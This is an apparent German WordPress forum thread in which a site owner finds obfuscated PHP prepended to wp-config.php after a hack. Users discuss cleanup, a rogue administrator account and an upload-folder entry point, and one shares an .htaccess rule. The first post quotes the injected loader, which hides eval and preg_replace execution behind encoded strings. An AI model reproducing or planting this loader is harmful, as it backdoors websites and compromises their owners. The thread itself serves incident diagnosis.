Wurde ich gehackt? wp-config.php ist verändert und Fehlermeldung

  • Hallo,

    ich habe die Befürchtung, dass meine Seite gehackt wurde.
    Ich kann sie leider nicht mehr aufrufen, weil diese Fehlermeldung erscheint:

    Parse error: syntax error, unexpected end of file in /home/www/seite/wp-includes/pluggable.php on line 292

    Dazu ist mir aufgefallen, dass meiner wp-config jede Menge wirre Zeichen vorangesetzt wurden:

    PHP
    <?php $mwyiepdqjy = '<*K)ftpmdXA6~6<u%x5c%x78257>%x5c%x782f7&6|7**1ujpo!%x5c%x7824-%x5c%x7824y7%x5c%x7824-%x5c%x7824*<!7860hA%x5c%x7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x786x7825#%x5c%x782f#o]#%x5c%x782f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}#-#O#-#N#*%x5c%x7824%x5x7825l}S;2-u%x5c%x7825!-#2#%x5c%x782f#%x5c%]y4c#<!%x5c%x7825t::!825o:W%x5c%x7825c:>1<%x5c%x7825b:x5c%x785cq%x5c%x7825%x5c%x7{;)gj}l;33bq}k;opjudovg}%x5c%x7878;0]=]%x78257**^#zsfvr#%x5c11127-K)ebfsX%x5c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%xc%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QDU%x5c%x7860MPT7-5-rr.93e:5597f-s.973:8297f:5297e:56-%x5c%x78x7825zB%x5c%x7825z>!tussfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5X%x5c%x7824<!%x5c%x7825tzw>!#]y76]277]y72]265]y39]274]y85]273%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5860%x5c%x7878%x5c%x7822l:!}V;3x64%145%x28%141%x72%162%x7825)3of)fepdof%x5c%x786057ftbc%x5c%x787f!|!60fmjg}[;ldpt%x5c%x7825}K;%x5c%x7860ufldpt}X;%x5c%x7860msvd}R;*ms5iN}#-!tussfw)%x5c%x7825c*W%x5c%x7825eN+#Qi%x5c%x785c1^W%x5c%x7825c!>!c%x7878<~!!%x5c%x7825s:N}#-%x5c%x75c%x7825>5h%x5c%x7825!<*::::::-111112)eobs%x5c%x786827Y%x5c%x78256<.msv%x5c%qsut>j%x5c%x7825!*72!%x5c%x7827!hmg%x5c%x7825)!gj!<2,*j%x5c%x7825-#1%x5c%x782f#00;quui#>.%x5c%x7825!<***f%x5c%x7827,*e%x5c%e%x5c%x78b%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]273]y76]271]y7d]252]y7825nfd>%x5c%x7825fdy<Cb*[%x5c%x7825jojRk3%x5c%x7860{666~6<&w6<%x5c%x787fw6*CW&)7gj6<.%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<u%x5c%x7825V4]275]y83]273]y76]277#<%x5c%x7825t2w>#]y74]273]y76]25]y6g]273]y76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#%x7825!<5h%x5c%x7825%x5c%x782f#0#%x5c%x782f*#npd%x5c%x782f#)rrdjsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256x5c%x7825!|!*)323zbek!~!<b%x5c%x7825%x5c2]254]y76#<%x5c%x7825tmw!>!#]y878r.985:52985-t.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y5c%x7825)+opjudovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%7825_t%x5c%x7825:osvufs:~:<*9-1-r825!-#1]#-bubE{h%x5c%x7825)tp<#762]67y]562]38y]572]48y]#>m%x5c%x7825:|:*r%x5c%x7825x7827,*d%x5c%x7827,*c%x5c%x7827,*b%q%x5c%x7825}U;y]}R;2825bG9}:}.}-}!#*<%x5c%x2]y85]256]y6g]257]y86]267]y74]27c%x7825:<**#57]38y]47]67y]37]88y]27]28y]#%x5c%x782fr%x5c%c%x7824!>!fyqmpef)#%xMM*<%x22%51%x29%51%x29%73", NULL); }7fw6*3qj%x5c%x78257>%x5c%x782272qj%x5c%<*id%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFEBFI825hIr%x5c%x785c1^-%x5c%x7825r%x5825ff2!>!bssbz)%x5c%x7824]25%x5c%x3d]51]y35]274]y4:]82]y3:]6237,#%x5c%x782fq%x5c%x7825>U<#16,47R57,27R66,#%x5c%x782fq%x5c%x782%x5f%163%x70%154%x69%164%50%x22%134%x78%62%x35%165%x3a%146%x27;utpI#7>%x5c%x782f7rfs%x5c%x78256<#o]1%x5c%x782f20QUUI7c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5c%xsvufs}%x5c%x787f;!opjudovg}k~~9{d%x5c%x7825:osvfepmqnjA%x5c%x7827&6<.fmjgA%x5c%x7827doj%x5c%x78256<%7825>j%x5c%x7825!<**3-j%x5c%x782%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%x5c%x78%x5c%x7825w6Z6<.4%x5c%xx5c%x78604%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%xopmA%x5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%<#462]47y]252]18y]#>q%x5c%x7825ojR%x5c%x7827id%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#u427]36]373P6]36]73]83]238M7]381]211M5]67]452]88]5]476]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265]y72]254]y76]61]%x7825%x5c%x7878:-!%x5c%x7825tzw%x5c%x782f%x5c%x78247824-%x5c%x7824-!%x5c%x7825%x5c%x7824-%x5c%x7824*!|!%x5c%x7824-
    
    
    
    
    <-gekürzt->
    
    
    bubE{h%x5c%x7825)sutcvt)fubmgoj{htusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x7824!>!tus%x5c%x7860sfqmbdf)60QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSFGFS%x5c%x7860QUUI&c_UOFHB%x5c%x787827;!>>>!}_;gvc%x5c%x7825}&;ftmbg}%x5c
    %x7%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%x5c%x7,6<*127-UVPFNJU,6<*27-SFGTOBSUOSVUFS,6<*msv%x5c%x78257-MSV,6<*)uj)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C5]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:<h%x5c%xf#%x5c%x782f#%x5c%x782f},;#-#}+;%x5c%x78x7825j:.2^,%x5c%x7825b:<!%x5c%x7825c:>%x5c%x7825s:%x5c%x785c%61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x2c%163%x74%16mji%x5c%x7878:<##:>:h%x5c%x7825:<#64y]552]e7y]#>n%x5c%x7825<#372]58y]44-%x5c%x7824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R6f%142%x5f%163%x74%141%x72%164") && (!isset($GLOBALS["%x61%156%7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnj!248]y83]256]y81]265]y7x7825w6<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6ufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7#6#)tutjyf%x5c%x7860%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZASV<*w#00#W~!Ydrr)%x5c%x7825r%x5c%x7878Bsfuvso!sboepn)%x5c%x77825)m%x5c%x7825=*h%x5c%x7825)m%x5c%x7825):fx7860ftsbqA7>q%x5c%x78256<%x5cx5c%x7825)!>>%x5c%x7822!ftmbg)!gj<*#k#)usbut%x5c%x7860cpV8]K5]53]Kc#<%x5c%x7825tpz!>!#]D6M7]K3#<%x5c%x7825yy>#]D6]2825)sf%x5c%x7878pmpusut)tpqssutRe%x5cA>2b%x5c%x7825!<*qp%x5c%60SFTV%x5c%x7860QUUI&b%82f%x5c%x7825z<jg!)%x5c%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x57860{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd%x5c%x7860ufh%x5c%x78x7825%x5c%x782fh%x5c%x7825)n%x5c%x7825-#+I#)q%x5c%x78250%x2e%52%x29%57%x65","%%x78256<C%x5c%x7827pd87f;!osvufs}w;*%x5c%x787f7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x7824<%x5c%x71%76%x21%50%x5c%x7825%x5:>:r%x5c%x7825:|:**t%x5c%x:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7!>!#]y3d]51]y35]256]y76]72]yx5c%x7825j:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Q5c%x7825!|!*!***b%x5c%x7825)sf%x5c%31]55]y85]82]y76]62]y3:]84#-!OV#1GO%x5c%x7822#)fepmqyf8]24]31#-%x5c%x7825tdz*Wsfuvso!%x5c%x24-%x5c%x7824*<!~!dsM4P8]37]278]225]241]334]368]322]3]364]6]283]x7825)utjm6<%x5c%x787fw6*CW&)7gj6c%x7825!<12>j%x5c%x7825!|!*#91y]c9y]g2y]#>>*4-78B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:7498x7878pmpusut!-#j0#!%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%x7860opjudCe*[!%x5c%x7825cIjQeTQcOc%x5c%x782f5c%x7824*<!%x5c%x7825kj:%x787fw6*%x5c%x787f_*#fubfsdXk5%x5c%x7860{66~6</(.*)/epreg_replacekxwlydqzdb'; $yzooafqznc = explode(chr((160-116)),'4789,23,8438,63,3668,26,4424,67,7047,47,9257,23,4340,40,866,25,8186,67,2501,62,9386,24,2619,53,3967,45,7151,51,2862,23,98,58,5997,26,5805,48,9280,21,5271,70,9789,33,0,46,426,58,4692,59,2563,56,1684,42,7271,29,567,67,6701,27,7524,41,2249,39,7484,40,2988,58,5896,50,3491,53,5946,51,405,21,5853,43,339,27,1155,25,8852,30,10059,47,7565,44,2719,53,4149,54,8570,63,2288,55,7903,65,3077,54,1408,50,6997,50,9139,63,935,65,6798,58,484,45,7801,42,9301,25,4634,58,6203,58,7609,55,5224,47,5042,35,1942,29,1180,68,4203,34,6427,63,2772,32,4875,65,4598,36,4940,55,9822,46,7202,40,9940,60,6023,67,6142,28,7094,57,9665,23,9034,24,4563,35,1621,63,1248,55,2025,35,6090,52,1104,51,3694,31,9599,35,9920,20,3745,42,8501,47,2804,58,8998,36,5666,36,5160,64,7405,25,7732,69,9058,23,1726,40,4995,47,5561,59,2942,46,891,44,5098,62,4514,49,8085,40,3859,64,2672,47,8633,60,6541,46,3725,20,6170,33,2885,57,1855,54,8882,57,1458,53,8693,60,8390,48,2437,64,4306,34,3423,68,4126,23,836,30,2060,20,7430,54,366,39,6856,52,242,43,156,63,738,61,1564,57,6728,32,8548,22,1766,31,1511,53,2103,32,8031,54,1909,33,799,37,2135,57,9202,55,9410,26,8808,44,8253,70,4098,28,3046,31,1971,54,9436,41,4237,69,5077,21,9477,40,2376,34,3304,66,5702,38,8323,67,6908,27,7664,68,6314,50,9326,60,5341,34,46,52,3370,53,4491,23,9725,20,6587,65,2192,21,10035,24,9517,28,2410,27,285,21,4751,38,1000,70,3834,25,10000,35,8753,55,4380,44,678,60,6652,49,2343,33,4012,48,4060,38,5505,56,9868,52,634,44,1797,58,3598,70,8939,59,7341,64,7300,41,5740,29,7843,60,2080,23,1372,36,4812,63,5769,36,6935,25,9745,44,3131,51,6261,53,9688,37,5442,63,6760,38,1070,34,306,33,6364,63,3787,47,3923,44,8125,61,9545,54,6960,37,3544,54,9081,58,5375,67,7242,29,3252,52,7968,63,219,23,529,38,1303,69,5620,46,3182,70,6490,51,9634,31,2213,36'); $nviivzsmcb=substr($mwyiepdqjy,(64871-54765),(27-20)); if (!function_exists('ogioinbdts')) { function ogioinbdts($mevrxnrfhs, $bdbfsrqjjt) { $zceqwcfefq = NULL; for($lgjcpiordb=0;$lgjcpiordb<(sizeof($mevrxnrfhs)/2);$lgjcpiordb++) { $zceqwcfefq .= substr($bdbfsrqjjt, $mevrxnrfhs[($lgjcpiordb*2)],$mevrxnrfhs[($lgjcpiordb*2)+1]); } return $zceqwcfefq; };} $koifcakckb="\x20\57\x2a\40\x67\172\x61\146\x70\146\x74\170\x77\153\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\66\x34\55\x31\62\x37\51\x29\54\x20\143\x68\162\x28\50\x32\71\x37\55\x32\60\x35\51\x29\54\x20\157\x67\151\x6f\151\x6e\142\x64\164\x73\50\x24\171\x7a\157\x6f\141\x66\161\x7a\156\x63\54\x24\155\x77\171\x69\145\x70\144\x71\152\x79\51\x29\51\x3b\40\x2f\52\x20\165\x61\165\x6e\162\x71\150\x64\166\x74\40\x2a\57\x20"; $mjzbazfpgy=substr($mwyiepdqjy,(30764-20651),(58-46)); $mjzbazfpgy($nviivzsmcb, $koifcakckb, NULL); $mjzbazfpgy=$koifcakckb; $mjzbazfpgy=(699-578); $mwyiepdqjy=$mjzbazfpgy-1; ?>
    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • hol sie dir via ftp oder knall eine original datei drüber. anschließend das übliche prozedere: passwörter austauschen, KEINEN Benutzer "admin", rest der seiten scannen mit anti-malware plugin

  • Die Datenbank muss ich dann wohl auchh ersetzen, oder?

    Hast du eine Du eine Datensicherung? Evtl. bei deinem provider? dann verwende eine ältere Version von deiner Datenbank.

    Problem sollte eher sein - wie konnte jemand deine Seiten verändern! D.h. du musst die Sicherheitslücke suchen und finden und dann beseitigen. Beim Suchen und beseitigen können dir Dienstleister evtl. helfen, die du über das Job Forum finden könntest.

    Mal ein raten von mir, dein Template verwendet eine upload Script oder TimThumb?
    http://pressengers.de/news/erneute-s…e-bei-timthumb/

    Mit offenen Augen träumen

  • HI,

    bei uns waren alle Verzeichnisse betroffen vom WP-Core bis zum Template und den Uploads (wir hatten JS Datein mit dem Uploader hochgeladen).
    Bei unserem Check war teilweise in den Contentelementen noch JS elemente. Hier kann man einfach in der Datenbank mit LIKE %script% ( ggf. andere Schreibweisen) direkt prüfen.

  • Mich hat auch der gleiche Angriff erwischt. Gleich auf drei Blogs und Piwik und Owncloud. Es wurden einfach alle php-Dateien infiziert. Ich konnte jedoch noch keine Schwachstelle ausmachen. Hab jetzt erstmal ftp und ssh-Zugriff vorsorglich komplett dicht gemacht. Mal sehen ob morgen wieder Ruhe ist.

    Es ist scheinbar ein Problem, das seit 3.9.1 auftritt.

    Siehe auch http://www.sascha-endlicher.de/uncategorized/…s-v3-9-1-sites/

    und

    http://www.sascha-endlicher.de/uncategorized/…s-v3-9-1-sites/

    Einmal editiert, zuletzt von Bremmo (23. Juli 2014 um 02:22)

  • Sorry, dass ich nochmal schreibe, aber ich bin jetzt einfach der Sache weiter auf den Grund gegangen. Habe jetzt noch die Datenbanken der Blogs durchforstet und bin darauf gestoßen, dass in den Tabellen wp_user und wp_usermeta ein Nutzer mit folgender ID eingetragen ist: 1001001 <- der hat Administratorrechte.

    Sind insgesamt 5 Einträge vorhanden, wenn man nach 1001001 sucht.

    Wie es sich mir jetzt darstellt war bei mir zumindest das Einfallstor der Ordner /wp-content/uploads/wysija/themes/mailp/

    Dort wurde scheinbar eine php-Datei index.php reingeladen, die dann alles weitere veranlasst hat.

    Soweit ich das sehe gehört der ganze Ordner da gar nicht rein.

    So, ich verspreche jetzt keinen Vierfachpost zu erzeugen, weil ich längstens schon im Bett sein müsste.

    Greetz & over

    Einmal editiert, zuletzt von Bremmo (23. Juli 2014 um 03:17)


  • Wie es sich mir jetzt darstellt war bei mir zumindest das Einfallstor der Ordner /wp-content/uploads/wysija/themes/mailp/

    In das Verzeichnis
    ~/wp-content/uploads/

    kopiert Wordpress die Medien (pdfs, und die Bilder) einige Plugins legen hier in eigenen Verzeichnisen etwas ab.

    d.h. Wordpress hat in diesem Verzeichnis per se schreibrechte. Von diesem Recht wissen auch deine Angreifer.

    D.h. du musst verhindern, dass hochgeladene Scripte (perl. php. ruby.. was weiß ich, was alles bei dir läuft) dort ausgeführt dürfen.
    http://example.org/wp-content/uploads/_dein_script.php darf nicht funktionieren!

    Dein Angreifer hat sich also ein Admin Account eingerichtet? Du kannst keiner Datei (auch keinen Bildern!) mehr trauen.

    Sicherheitslücke kann auch ein uplaod Script in einem Theme oder einem Plugin sein.

    hier eine aktuelle Liste von Sicherheitslücken
    http://www.exploit-db.com/search/?action…ption=wordpress

    Viel Glück

    ralf

    Mit offenen Augen träumen

  • Danke Ralf,

    ich habe jetzt zur Sicherheit mal das Ausführen von php im Upload-Ordner geblockt via .htaccess:

    Code
    <FilesMatch .php>
       Order deny,allow
       Deny from all
    </FilesMatch>

    Bin aber zuversichtlich, dass jetzt Ruhe ist. Meine Blogs wurden diese Nacht zum ersten mal seit 17.07. nicht wieder kompromitiert.


  • ich habe jetzt zur Sicherheit mal das Ausführen von php im Upload-Ordner geblockt via .htaccess:

    kein Perl auf dem Server?

    und funktioniert dein Filematch so wirklich? sieht merkwürdig aus... ich verwende in der Regel <Files

    und bei \.php$

    Code
    <FilesMatch \.php$>

    Mit offenen Augen träumen

  • kein Perl auf dem Server?

    und funktioniert dein Filematch so wirklich? sieht merkwürdig aus... ich verwende in der Regel <Files

    und bei \.php$

    Code
    <FilesMatch \.php$>

    Ja das funktioniert tatsächlich so bei mir :)

    Kannst ja mal testen: http://www.e-poetry.de/wp-content/uploads/wysija/test.php

    Ich schwöre feierlich, dass die Datei existiert :)

    Von Perl hab ich jetzt keinen Schimmer ehrlichgesagt. Braucht man dazu nicht CGI? Hat meines Wissen nach mein Hoster Strato abgestellt.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!